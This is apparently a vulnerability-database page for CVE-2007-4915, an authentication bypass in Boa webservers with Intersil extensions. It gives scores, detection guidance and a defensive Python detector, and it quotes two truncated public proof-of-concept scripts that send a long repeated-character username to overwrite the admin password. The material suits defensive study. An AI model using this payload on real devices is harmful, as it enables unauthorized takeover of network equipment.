CVE-2007-4915
Published: 2007-09-17
Priority: P2 · EPSS 67% · CVSS 2.0: 10.0 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit available
EPSS: 67.65% (99.2th percentile)
The Intersil isl3893 extensions for Boa 0.93.15, as used on the FreeLan RO80211G-AP and other devices, do not prevent stack writes from entering memory locations used for string constants, which allows remote attackers to change the admin password stored in memory via a long username in an HTTP Basic Authentication request.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| boa | boa_webserver | — | — |
Detection & IOCs (extracted from sources)
Command IOC: `USERNAME = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'`
- Detect HTTP Basic Authentication requests where the username field exceeds 127 bytes in length, targeting Boa 0.93.x–0.94.11 servers with Intersil extensions.
- Monitor for HTTP Basic Auth requests where the Authorization header username is a long repeated-character string (e.g., 127+ 'a' characters), indicative of a memory overwrite attempt.
- The exploit targets the realm string 'LOGIN(default username & password is admin)'; alert on Basic Auth attempts using this exact realm string, as it is specific to vulnerable Intersil-extended Boa devices.
- The attack may also produce a denial-of-service condition on the target device; correlate authentication failures or device unresponsiveness with oversized Basic Auth username fields.
- Ensure the monitored URI is the directory requiring Basic Authentication; the exploit specifically targets protected paths such as /home/index.shtml.
- This vulnerability only affects Boa builds that include the Intersil isl3893 extensions; stock Boa installations are not vulnerable.
- The exploit overwrites the admin password in memory (not on disk); a device reboot may restore the original password, but the attacker gains temporary unauthorized access.
- The default target IP used in public exploit code is 192.168.0.1 (typical LAN gateway address for affected devices such as the FreeLan RO80211G-AP); detections should not be limited to this address.
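The detection guidance above can be turned into a small checker that decodes the `Authorization: Basic` header, measures the username in bytes, and flags the two signals the bullets name (more than 127 bytes, or a long run of a single repeated character), raising the severity when the challenge realm matches the Intersil string. The following is an added example written for this page, not code from the CVE record, Exploit-DB or the Metasploit module; the event dictionaries, their field names (`src`, `uri`, `realm`, `authorization`) and the sample values are constructed for illustration.

```python
import base64
import binascii
import re

# Threshold from the advisory text: Intersil-extended Boa builds overwrite the
# stored password once the Basic Auth username exceeds 127 bytes.
MAX_SAFE_USERNAME_BYTES = 127
# Realm string the page reports as specific to the vulnerable devices.
VULNERABLE_REALM = "LOGIN(default username & password is admin)"
# Minimum length before a single repeated character is treated as suspicious
# (a constructed heuristic threshold, not a value from the page).
REPEATED_CHAR_MIN_LEN = 16

_BASIC_RE = re.compile(r"^\s*Basic\s+([A-Za-z0-9+/=]+)\s*$")


def parse_basic_auth(header_value):
    """Return (username, password) as bytes from an Authorization header value,
    or None when the header is not well-formed HTTP Basic authentication."""
    match = _BASIC_RE.match(header_value or "")
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (ValueError, binascii.Error):
        return None
    user, sep, password = raw.partition(b":")
    if not sep:
        return None
    return user, password


def assess_event(event):
    """Classify one logged request. Returns an alert dict or None.

    The username length is measured in bytes after base64 decoding, because the
    overwrite depends on the byte count copied on the server, not on characters.
    """
    creds = parse_basic_auth(event.get("authorization"))
    if creds is None:
        return None
    user, _ = creds
    reasons = []
    if len(user) > MAX_SAFE_USERNAME_BYTES:
        reasons.append("username_exceeds_127_bytes")
    if len(user) >= REPEATED_CHAR_MIN_LEN and len(set(user)) == 1:
        reasons.append("repeated_single_character_username")
    if not reasons:
        return None
    # A matching realm on its own is normal for legitimate admin logins, so it
    # only escalates severity rather than triggering an alert by itself.
    severity = "high" if event.get("realm") == VULNERABLE_REALM else "medium"
    return {
        "src": event.get("src"),
        "uri": event.get("uri"),
        "username_len": len(user),
        "severity": severity,
        "reasons": reasons,
    }


def scan_events(events):
    """Run assess_event over a sequence of request records and collect alerts."""
    return [alert for alert in (assess_event(e) for e in events) if alert]


# Constructed sample records: one normal login, one oversized repeated-character
# username against the protected path, and one unrelated non-Basic request.
SAMPLE_EVENTS = [
    {"src": "10.0.0.5", "uri": "/home/index.shtml", "realm": VULNERABLE_REALM,
     "authorization": "Basic " + base64.b64encode(b"admin:admin").decode()},
    {"src": "10.0.0.9", "uri": "/home/index.shtml", "realm": VULNERABLE_REALM,
     "authorization": "Basic " + base64.b64encode(b"a" * 128 + b":owned").decode()},
    {"src": "10.0.0.7", "uri": "/", "realm": "other",
     "authorization": "Bearer not-basic-auth"},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

Run stand-alone, the script reports only the second record: a 128-byte username made of one repeated character, sent to the protected directory under the Intersil realm, so both reasons fire and the severity is `high`. The length check is the one that matters for the overwrite; the repeated-character check catches the public proof-of-concept's padding style but would miss a padded username built from varied bytes, so it should never replace the byte-count rule.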
No detection rules found.
Exploit-DB: Boa 0.93.15 - HTTP Basic Authentication Bypass (exploitdb · 2007-10-16)
---
/*
* Boa HTTP Basic Authentication Bypass
* Vuln: Boa/0.93.15 (with Intersil Extensions)
*
* Original Advisory:
* http://www.securityfocus.com/archive/1/479434
* http://www.ikkisoft.com/stuff/SN-2007-02.txt
*
* Luca "ikki" Carettoni
* http://www.ikkisoft.com
*/
----

```python
#!/usr/bin/env python
import urllib2

SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'

auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)',
                          SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res  # listing truncated at the source
```
Exploit-DB: Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass (exploitdb · 2007-09-14)
---
source: https://www.securityfocus.com/bid/25676/info
Boa is prone to an authentication-bypass vulnerability because the application fails to ensure that passwords are not overwritten by specially crafted HTTP Requests.
An attacker can exploit this issue to gain unauthorized access to the affected application. This may lead to other attacks.
This issue affects Boa 0.93.15; other versions may also be affected.
NOTE: This issue affects only Boa with Intersil Extensions installed.
```python
#!/usr/bin/env python
import urllib2

SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'
a  # listing truncated at the source
```
Metasploit: Intersil (Boa) HTTPd Basic Authentication Password Reset
The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11 allows basic authentication bypass when the user string is greater than 127 bytes long. The long string causes the password to be overwritten in memory, which enables the attacker to reset the password. In addition, the malicious attempt also may cause a denial-of-service condition. Please note that you must set the request URI to the directory that requires basic authentication in order to work properly.
No writeups or analysis indexed.
References
- http://securityreason.com/securityalert/3151
- http://www.gnucitizen.org/projects/router-hacking-challenge/
- http://www.ikkisoft.com/stuff/SN-2007-02.txt
- http://www.securenetwork.it/ricerca/advisory/download/SN-2007-02.txt
- http://www.securityfocus.com/archive/1/479434/100/0/threaded
- http://www.securityfocus.com/archive/1/489009/100/0/threaded
- http://www.securityfocus.com/bid/25676
- https://www.exploit-db.com/exploits/4542